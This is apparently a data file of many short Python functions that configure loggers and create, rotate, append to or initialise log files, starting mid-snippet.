url.File(loglinkname).abs()\n\t\t\t\tskipurls.append(loglinkname)\n\t\t\t\tlogfilename = logfilename.relative(loglinkname)\n\t\t\t\ttry:\n\t\t\t\t\tlogfilename.symlink(loglinkname)\n\t\t\t\texcept OSError as exc:\n\t\t\t\t\tif exc.errno == errno.EEXIST:\n\t\t\t\t\t\tloglinkname.remove()\n\t\t\t\t\t\tlogfilename.symlink(loglinkname)\n\t\t\t\t\telse:\n\t\t\t\t\t\traise\n\t\t\tself._loggers.append(URLResourceLogger(self, logfile, skipurls, self._formatlogline))", "def logfile(targetfile=\"ros.log\"):\n log = logging.getLogger(__name__)\n log.basicConfig(filename=str(targetfile))", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def init_log_file(self):\r\n try:\r\n os.makedirs(config[\"server_log_path\"])\r\n except OSError:\r\n if not os.path.isdir(config[\"server_log_path\"]):\r\n raise\r\n server_log_file = logging.FileHandler(\r\n config[\"server_log_path\"] + 'server_log_' + time.strftime('%Y-%m-%d_%H.%M.%S') + '.txt')\r\n server_log_file.setLevel(logging.DEBUG)\r\n server_log_file.setFormatter(file_formatter)\r\n server_log.addHandler(server_log_file)", "def create_logger():\n global logger\n\n formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\n handler = TimedRotatingFileHandler(log_file, when=\"midnight\", interval=1)\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n handler.suffix = \"%Y-%m-%d\"\n logger = logging.getLogger(\"sacplus\")\n logger.setLevel(log_level)\n logger.addHandler(handler)", "def make_log():\n log_file = os.path.join(phys_dir,'ge_phys2bids_'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")+'.log')\n with open(log_file,'w') as log:\n log.write('-------- GE phys2bids --------\\n\\n')\n log.write('DICOM directory: %s\\n'%dcm_dir)\n log.write('Physiology directory: %s\\n'%phys_dir)\n log.write('Output directory: %s\\n\\n'%out_dir)\n log.write('%d EPI files were found\\n\\n'%len(dcm_dict))\n for rn in dcm_dict.keys():\n log.write('------------------------------\\n')\n log.write('%s\\n'%dcm_dict[rn]['out_name'])\n log.write('Start time: %s\\n'%dcm_dict[rn]['start_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('End time: %s\\n'%dcm_dict[rn]['end_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('PPG file: %s\\n'%dcm_dict[rn]['ppg_file'])\n log.write('Respiration file: %s\\n'%dcm_dict[rn]['resp_file'])\n log.write('ECG file: %s\\n'%dcm_dict[rn]['ecg_file'])\n log.write('------------------------------\\n\\n')", "def initialize_logger():\n if not os.path.exists(LOGGING_DIRECTORY):\n os.makedirs(LOGGING_DIRECTORY)\n os.chmod(LOGGING_DIRECTORY, 0o777)", "def create_log(self):\n from settings import evidence_path\n test_case = self.__class__.__name__\n log_extension = '.log'\n if evidence_path is not None:\n log_path = '{}/{}{}'.format(\n evidence_path, test_case, log_extension\n )\n else:\n log_path = None\n self.log = Log(log_path)\n self.log = self.log.get_logger()\n return self.log", "def log(msg, logfile):\n print(msg)\n logfile.write(msg + \"\\n\")", "def create_log_file(path):\n with open(path, 'w'):\n pass", "def create_log_file(file_name: str):\n if not log_file_exists(file_name):\n os.mknod(get_complete_file_name(file_name))\n os.chmod(get_complete_file_name(file_name), 0o777)", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 'django_api'\r\n )", "def create_log_file(log_dir, filename):\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%H%M%S.%f')\n symlink_name = os.path.join(log_dir, filename)\n timestamped_name = '%s.%s' % (symlink_name, timestamp)\n if os.path.islink(symlink_name):\n os.remove(symlink_name)\n os.symlink(timestamped_name, symlink_name)\n return open(timestamped_name, 'w')", "def init_log():\n os.system('rm -rf /target/testdriver.log || true')\n os.system('touch /target/testdriver.log')\n os.system(f\"chown {uid_gid_output} /target/testdriver.log\")\n os.system('chmod 664 /target/testdriver.log')", "def create_logger():\n logging.basicConfig(level = logging.INFO, filename='logging', filemode='w')\n logger = logging.getLogger(\" \")\n admin_handler = logging.FileHandler('logging')\n admin_handler.setLevel(logging.INFO)\n logger.addHandler(admin_handler)\n logger.warning(f'{admin_handler} created a new logger')\n return logger", "def append_logfile(filename, file_str):\n file_str = \"[\" + get_datetime_str() + \"]\" + file_str\n write_file(filename, file_str, append=1)", "def open_log(fn):\n\n global log_file\n if fn is not None:\n d = os.path.dirname(fn)\n if d != \"\":\n makedirs(d)\n log_file = open(fn, \"a+\")", "def set_log_file(filename):\n pass", "def setup_log(self, log_file):\n directory = os.path.dirname(log_file)\n if directory:\n os.makedirs(directory, exist_ok=True)\n\n logger = logging.getLogger(log_file)\n formatter = logging.Formatter(config.LOG_FORMAT)\n\n file_handler = logging.FileHandler(log_file, mode='a')\n file_handler.setFormatter(formatter)\n\n logger.setLevel(logging.INFO)\n logger.addHandler(file_handler)\n\n return logger", "def write_logfile(filename, content, directory):\n logfile = os.path.join(directory, f\"{filename}.log\")\n f = open(logfile, 'a+')\n f.write(content)\n f.write(\"\\n\")\n f.close()\n return logfile", "def setup_logger(save_dir, distributed_rank=0, filename=\"log.txt\", mode=\"a\"):\n save_file = os.path.join(save_dir, filename)\n if mode == \"o\" and os.path.exists(save_file):\n os.remove(save_file)\n if distributed_rank > 0:\n logger.remove()\n logger.add(\n save_file, format=\"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}\", filter=\"\", level=\"INFO\", enqueue=True\n )\n\n return logger", "def init_logging(filepath=os.path.dirname(os.path.abspath(__file__))):\r\n logfile = filepath\r\n logfile += '\\\\Logs\\\\'\r\n if not os.path.isdir(logfile):\r\n os.makedirs(logfile)\r\n logfile += datetime.now().strftime('%m-%d-%Y') + '_File_Moving.log'\r\n with open(logfile, 'w'):\r\n pass\r\n logging.basicConfig(filename=logfile, level=logging.DEBUG,\r\n format='%(levelname)s: -- %(asctime)s -- %(message)s',\r\n datefmt='%m/%d/%Y %H:%M:%S %p')", "def logsave(self):\n log_file = open(self.conf[\"output_prefix\"] + \"_log.txt\", \"w\")\n try:\n log_file.write(self.log)\n finally:\n log_file.close()", "def _create_agent_log():\n log_file = SETTINGS['agent.log_file']\n if not log_file.endswith('.rollbar'):\n log.error(\"Provided agent log file does not end with .rollbar, which it must. \"\n \"Using default instead.\")\n log_file = DEFAULTS['agent.log_file']\n\n retval = logging.getLogger('rollbar_agent')\n handler = logging.FileHandler(log_file, 'a', 'utf-8')\n formatter = logging.Formatter('%(message)s')\n handler.setFormatter(formatter)\n retval.addHandler(handler)\n retval.setLevel(logging.WARNING)\n return retval", "def _create_log_dir():\n if not os.path.exists(FLASK_APP.config[\"LOG_DIR\"]):\n os.makedirs(FLASK_APP.config[\"LOG_DIR\"])", "def setup_logging(log_basedir=\"logs\"):\n BASEDIR = os.path.abspath(os.path.dirname(__file__))\n LOGDIR = os.path.join(BASEDIR,log_basedir)\n \n # Check if the logs directory exists and is writable\n if not os.path.isdir(LOGDIR):\n print('ERROR: Log directory {} does not exist.'.format(LOGDIR))\n sys.exit(1)\n if not os.access(LOGDIR, os.W_OK):\n print('ERROR: No permissions to write to log directory {}.'.format(LOGDIR))\n sys.exit(1)\n\n # Set the log message format\n fmt = '%(levelname)s - %(asctime)s.%(msecs).03d %(process)d [%(filename)s:%(lineno)d] %(message)s'\n datefmt = '%m%d %H:%M:%S'\n formatter = logging.Formatter(fmt, datefmt)\n\n # Log to console\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n root.addHandler(console_handler)\n\n # Log to file, use a rotating file\n file_name = os.path.join(LOGDIR, '{}.log'.format(\"flask_api_otrs\") )\n\n file_handler = logging.handlers.RotatingFileHandler(file_name, backupCount=7)\n file_handler.setFormatter(formatter)\n root.addHandler(file_handler)", "def init_logs():\n\n #Ensure that the directories are made\n make_dirs()\n\n #Create FileHandler logging handler, set it's log level, configure the log storage format,\n # and add the formatter to the root logger\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logging.root.addHandler(fh)\n logging.root.setLevel(logging.INFO)\n\n #Report it to the world!\n logging.info(\"Saving logs to \" + log_file)", "def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):\n\n LOG.setLevel(logging.INFO)\n if backup_count is not None and max_bytes is not None:\n assert backup_count > 0\n assert max_bytes > 0\n ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count)\n else: # Setup stream handler.\n ch = logging.StreamHandler(sys.stdout)\n\n ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '\n '%(levelname)s: %(message)s'))\n LOG.addHandler(ch)", "def setlogfile(file_name):\n global logfile\n logfile = file_name", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def logging_setup(args, log_dir):\n timestamp_file = datetime.now().strftime(\"%Y%m%d-%H.%M_rcf_abb.log\")\n log_file = Path(log_dir) / timestamp_file\n\n handlers = []\n\n if not args.skip_logfile:\n handlers.append(log.FileHandler(log_file, mode=\"a\"))\n if not args.quiet:\n handlers.append(log.StreamHandler(sys.stdout))\n\n log.basicConfig(\n level=log.DEBUG if args.debug else log.INFO,\n format=\"%(asctime)s:%(levelname)s:%(funcName)s:%(message)s\",\n handlers=handlers,\n )", "def test_init_logger_with_logfile(monkeypatch):\n log_path = f\"{gettempdir()}/{uuid()}.log\"\n assert not Path(log_path).exists()\n monkeypatch.setenv(\"LOG_OUTPUT\", log_path)\n logger = helpers.init_logger(uuid())\n msg = \"Write to disk.\"\n logger.warning(msg)\n assert Path(log_path).exists()\n with open(log_path, \"r\") as log:\n assert msg in log.read()", "def setLogFile(filename):\n\tglobal logfile\n\tlogfile = filename", "def setup_log(fileno):\n \n global logger\n logger = logging.Logger('log')\n handler = logging.StreamHandler(os.fdopen(fileno, 'a', 0))\n handler.setFormatter(logging.Formatter(\"[%(asctime)s] - [%(levelname)s] - %(message)s\", datefmt=None))\n logger.addHandler(handler)", "def init_logging(to_file=False, filename=None):\n if to_file:\n if filename is None:\n filename = timestamp() + '.log'\n logging.basicConfig(level=logging.INFO, format='%(message)s', filename=filename)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) # write to stdout + file\n print('Logging to:', filename)\n else:\n logging.basicConfig(level=logging.INFO, format='%(message)s')", "def logToFile(output, file): \r\n print( output, file=file )", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10000,# Ten thousand should be enough to crash before we reach it.\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def establish(lvl='INFO', logName=None, logPath=None, backups=0):\n try:\n print 'Script Started. Setting up Logging.'\n\n # Set logging level\n if lvl == 'DEBUG':\n logLevel = logging.DEBUG\n elif lvl == 'INFO':\n logLevel = logging.INFO\n elif lvl == 'WARNING':\n logLevel = logging.WARNING\n elif lvl == 'ERROR':\n logLevel = logging.ERROR\n else:\n print 'Invalid logging level. Choose: ERROR, WARNING, INFO, DEBUG'\n return\n\n # Setup basic logging configuration to standard output stream\n logging.basicConfig(level=logLevel, format=\"%(asctime)s\\t%(levelname)s:\\t%(message)s\")\n \n if logName != None and logName.strip() != '':\n # A logName has been provided so create a log file\n if logPath == None or logPath.strip() == '':\n # If no logPath is provided, use relative path\n logPath = r'.\\\\'\n logPathName = os.path.join(logPath, str(logName).strip())\n # If backups are needed, set the write style (write/append)\n if backups == 0:\n logMode = 'w'\n else:\n logMode = 'a'\n # Setup logging to a file\n fh = logging.handlers.RotatingFileHandler(filename=logPathName, mode=logMode, backupCount=int(backups))\n fh.setLevel(logLevel)\n formatter = logging.Formatter('%(asctime)s\\t%(levelname)s:\\t%(message)s')\n fh.setFormatter(formatter)\n logging.getLogger('').addHandler(fh)\n if os.path.isfile(logPathName):\n fh.doRollover()\n info('STARTING THE SCRIPT: {0}'.format(sys.argv[0]))\n info('Script running on host: {0}'.format(socket.gethostname()))\n info('Script running under the account of: {0}'.format(os.environ.get('USERNAME')))\n info('Log file created at: {0}'.format(logPathName))\n else:\n info('STARTING THE SCRIPT: {0}'.format(sys.argv[0]))\n info('Script running on host: {0}'.format(socket.gethostname()))\n info('Script running under the account of: {0}'.format(os.environ.get('USERNAME')))\n fh = None\n return fh\n except:\n print 'Error Establishing Log: {0}'.format(traceback.format_exc())", "def create_logger(args, save_dir, fname=None):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.INFO)\n if fname is None:\n fname = 'stdout.log'\n hdlr = logging.FileHandler(os.path.join(save_dir, fname))\n hdlr.setLevel(logging.INFO)\n msg_format = '%(asctime)s [%(levelname)s] %(message)s'\n formatter = logging.Formatter(msg_format)\n ch.setFormatter(formatter)\n hdlr.setFormatter(formatter)\n root.addHandler(ch)\n root.addHandler(hdlr)\n logging.info(sys.version_info)\n logging.info(args)\n\n return logging", "def generate_log_filename():\n return \"LOG_\"+strftime(\"(%Y-%m-%d)_%H-%M-%S\", gmtime())+\".txt\"", "def log(arguments, message):\n\n # Prints the message to console if verbose is set to True.\n if arguments.verbose:\n print(message)\n\n # Logs the message within a specific log file is defined.\n if arguments.log_dir != '':\n # Creates the directory for the log files.\n os.makedirs(arguments.log_dir, exist_ok=True)\n\n # Logs the message to the log file.\n print(message, file=open(os.path.join(arguments.log_dir, f\"{arguments.experiment}_log.txt\"), 'a'))", "def initLogging ( logFile ):\n logging.basicConfig(\n filename=logFile,\n level=logging.INFO,\n format='%(asctime)s %(levelname)-8s %(message)s',\n filemode='w'\n )", "def init_logs() -> None:\n logging.basicConfig(\n filename=\"logs.txt\",\n filemode=\"w\",\n format=\"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\",\n level=logging.ERROR,\n )\n\n formatter = logging.Formatter(\n \"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\"\n )\n\n global logger\n logger = logging.getLogger(__name__)\n\n # simlogger = logging.getLogger(\"netsquid\")\n # simlogger.setLevel(logging.DEBUG)\n # fhandler = logging.FileHandler(\"simlogs.txt\", mode=\"w\")\n # fhandler.setFormatter(formatter)\n # simlogger.addHandler(fhandler)\n\n # shandler = logging.StreamHandler(stream=sys.stdout)\n # shandler.setLevel(logging.ERROR)\n # shandler.setFormatter(formatter)\n # simlogger.addHandler(shandler)", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10,# Ten should be enough to debug but not use too mcuh storage\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(config.console_log_level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def daf_log():\n log_message = sys.argv.pop(0).split(\"/\")[-1]\n for i in sys.argv:\n log_message += \" \" + i\n with open(LOG_FILE_NAME, \"a\") as file_object:\n file_object.write(log_message + \"\\n\")", "def open_logfile(name):\r\n\r\n _format = \"%(asctime)s.%(msecs)03d %(name)-10s: %(levelname)-8s: %(message)s\"\r\n _datefmt = \"%H:%M:%S\"\r\n\r\n if config[\"log_dir\"] != None:\r\n filename = os.path.join(config[\"log_dir\"], name) + \".log\"\r\n else:\r\n filename = config[\"log_file\"]\r\n\r\n logger = logging.getLogger()\r\n\r\n # Remove any existing handlers\r\n for handler in logger.handlers:\r\n logger.removeHandler(handler)\r\n handler.close()\r\n\r\n # Add a new handler\r\n handler = logging.FileHandler(filename, mode='a')\r\n handler.setFormatter(logging.Formatter(_format, _datefmt))\r\n logger.addHandler(handler)", "def _init_log(self):\n if not os_path_exists(self.log_file):\n self._write('', 'w')", "def init_log(path):\n file = open(path, 'w+')\n file.close()", "def make_logger(model_dir: str, log_file: str = \"train.log\") -> Logger:\n logger = logging.getLogger(__name__)\n if not logger.handlers:\n logger.setLevel(level=logging.DEBUG)\n fh = logging.FileHandler(\"{}/{}\".format(model_dir, log_file))\n fh.setLevel(level=logging.DEBUG)\n logger.addHandler(fh)\n formatter = logging.Formatter(\"%(asctime)s %(message)s\")\n fh.setFormatter(formatter)\n if platform == \"linux\":\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(sh)\n logger.info(\"Hello! This is Joey-NMT.\")\n return logger", "def setupLogging(self):\n\t\ttry:\n\t\t\tself.logger = logging.getLogger(__name__)\n\t\t\thandler = RotatingFileHandler(self.logFile, maxBytes=500000, backupCount=5)\n\t\t\tformat = \"%(asctime)s %(levelname)-8s %(message)s\"\n\t\t\thandler.setFormatter(logging.Formatter(format))\n\t\t\thandler.setLevel(logging.INFO)\n\t\t\tself.logger.addHandler(handler)\n\t\t\tself.logger.setLevel(logging.INFO)\n\t\texcept Exception as err:\n\t\t\terrorStr = 'Error initializing log file, ',err\n\t\t\tprint(errorStr)\n\t\t\texit(1)", "def setup_script_logging():\n #handlers = [logbook.NullHandler()]\n format_str = (\"[{record.time:%Y-%m-%dT%H:%MZ}] \"\n \"{record.level_name}: {record.message}\")\n\n #handler = logbook.StreamHandler(sys.stderr, format_string=format_str,\n # level=\"DEBUG\")\n #handler.push_thread()\n #return handler", "def setup_logging(\n format_file=\"%(asctime)s - [%(levelname)s:%(name)s] %(message)s\",\n format_stout=\"[%(levelname)s:%(name)s] %(message)s\",\n level=logging.INFO,\n filename=f\"{DIR_SIMFILES}/_mdsea_logdump.log\",\n maxbytes=500000, # 500 kB\n) -> None:\n import logging\n import os\n\n looger_root = logging.getLogger(\"mdsea\")\n looger_root.setLevel(level=level)\n\n # SUPPRESSED_MODULES = (\"matplotlib\", \"apptools\", \"asyncio\", \"mayavi\", \"pyface\")\n\n # Set StreamHandler\n handler = logging.StreamHandler()\n handler.setFormatter(logging.Formatter(fmt=format_stout))\n handler.setLevel(level=level)\n looger_root.addHandler(handler)\n\n # Check if the directory where the log will live exists\n _dir = \"/\".join(filename.split(\"/\")[:-1])\n if not os.path.exists(_dir):\n os.mkdir(_dir)\n\n # Set RotatingFileHandler\n handler = RotatingFileHandler(filename, maxBytes=maxbytes, backupCount=1)\n handler.setFormatter(fmt=logging.Formatter(format_file))\n handler.setLevel(level=level)\n looger_root.addHandler(handler)\n\n looger_root.debug(\"logging setup successful!\")", "def instantiate_logs(self):\n\n # Log file\n timestamp = datetime.now().strftime(\"%Y-%m-%dT%H%M%S\")\n self.log_dir = os.path.join(\"experiment_logs\", timestamp)\n\n # Create Log directory if it does not exist\n try:\n os.makedirs(self.log_dir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n self.info_file = os.path.join(self.log_dir, \"run_info.txt\")\n self.log_file = os.path.join(self.log_dir, \"data.csv\")\n\n with open(self.info_file, \"w+\") as f:\n f.write(\"Period = {}\\nMaxVel = {}\".format(self.period, self.max_vel))\n\n self.log_file_desc = open(self.log_file, \"w+\")\n self.log_file_desc.write(\"t, current_vel, current_h_angle, current_v_angle, x, y, z, roll, pitch, yaw\")", "def init_logfile(self):\n\t\tif os.path.exists(self.logfile):\n\t\t\t# move the logfile aside and compress it\n\t\t\tbz_file = bz2.BZ2File(\"%s.bz2\" % self.logfile,'w')\n\t\t\tlog = open(self.logfile,'r')\n\t\t\tbz_file.writelines(log.readlines())\n\t\t\tlog.close()\n\t\t\tbz_file.close()\n\t\t#print \"Logging output to %s\" % self.logfile\n\t\tdate = dateutil.get_datetime()\n\t\ttime = dateutil.get_datetime(1)\n\t\tnew_file = open(self.logfile,'w')\n\t\tnew_file.write(\"#------------------------- RSYNC LOG -------------------------\\n#\\n\")\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Date',date))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Time',time))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Source',self.source))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Destination',self.destination))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Command',self.command))\n\t\tnew_file.write(\"#%12s: %s\\n\\n\" % ('Logfile',self.logfile))\n\t\tnew_file.close()\n\t\treturn True", "def open_logfile(self):\r\n if self.output_option == 2:\r\n self.ER_file = open(self.result_filename, 'w')", "def make_log(process_id):\n filename = map_maker.logfile(process_id)\n if os.path.exists(filename):\n return flask.send_file(filename)\n else:\n flask.abort(404, 'Missing log file')", "def log_to_file(self, filename=None):\n if not filename:\n filename = '%s/../../output/sentimentpy.log' % os.path.dirname(os.path.realpath(__file__))\n file_handler = RotatingFileHandler(filename, 'a', 1000000, 1)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(self.formatter)\n self.log.addHandler(file_handler)\n return self", "def configLogging():\n # define a basic logger to write to file\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='/tmp/execute_pomset.log',\n filemode='w')\n\n # end def configureLogging\n pass", "def _create_logger(title, log_msg_id=\"\", log_file_suffix=\".log\"):\n\n logging.setLoggerClass(SkidlLogger)\n logger = logging.getLogger(title)\n\n # Errors & warnings always appear on the terminal.\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Errors and warnings are stored in a log file with the top-level script's name.\n handler = SkidlLogFileHandler(get_script_name() + log_file_suffix, mode=\"w\")\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Set logger to trigger on info, warning, and error messages.\n logger.setLevel(logging.INFO)\n\n # Augment the logger's functions to count the number of errors and warnings.\n logger.error = CountCalls(logger.error)\n logger.warning = CountCalls(logger.warning)\n\n return logger", "def logger(level, log_info):\n log_path = getconfig(\"log\", \"LOG_PATH\")\n log_level = getconfig(\"log\", \"LOG_LEVEL\")\n log_enable = getconfig(\"log\", \"LOG_ENABLE\")\n log_fname = getconfig(\"log\", \"LOG_FNAME\")\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n log_file = os.path.join(log_path, log_fname)\n # base on input string \"DEBUG\",\"ERROR\"... get level number\n lvl = l_type_lst.index(level)\n\n # now, begin to write into log file\n log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n log_pid = os.getpid()\n log_script = sys._getframe().f_back.f_code.co_filename.split('/')[-1]\n log_method = sys._getframe().f_back.f_code.co_name\n log_line = sys._getframe().f_back.f_lineno\n with open(log_file, \"a\") as log:\n if lvl <= int(log_level) and bool(log_enable):\n log.write(\"%s %s %s %s:%s:%s %s\\\n\\n\" % (log_time, log_pid, level, log_script, log_method, log_line, log_info))", "def init_log_file(folder_path, suffix=None, log_level=logging.INFO):\n\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n log_format = '[%(levelname)s]: %(asctime)s %(message)s'\n\n if suffix is not None:\n file_name = timestamp + '_' + suffix\n else:\n file_name = timestamp\n\n file_path = os.path.join(folder_path, file_name)\n logging.basicConfig(filename=file_path, level=log_level, format=log_format)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n\n return file_path", "def __init__(self, abs_path_logfile):\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n handler = logging.handlers.TimedRotatingFileHandler(abs_path_logfile, when='D', interval=1)\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)", "def append_logfile(message=None, logfile=log, path=cwd):\n if message is None:\n return\n # Wrap the text if it is greater than 80 - 25 = 55 characters.\n # Indent 25 spaces to on left to allow for width of time stamp\n wrapper = textwrap.TextWrapper()\n wrapper.initial_indent = \" \" * 25\n wrapper.subsequent_indent = \" \" * 25\n wrapper.width = 80\n message = wrapper.fill(message).lstrip()\n\n if debug: print(path + logfile)\n f = open(path + logfile, \"a\")\n # Truncate the 6 digit microseconds to be 3 digits of milli-seconds\n stamp = (\"{0:%Y-%m-%d %H:%M:%S}.{1}:\".format(datetime.datetime.now(),\n datetime.datetime.now().strftime(\"%f\")[:-3]))\n if debug: print(stamp + \" \" + message)\n f.write(stamp + \" \" + message + \"\\n\")", "def configure_py_log(directory=None, filename=sys.argv[0], mode=\"w\"):\n if directory is None:\n logging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )\n else:\n logging.basicConfig(\n filename=os.path.join(directory, filename),\n filemode=mode,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )", 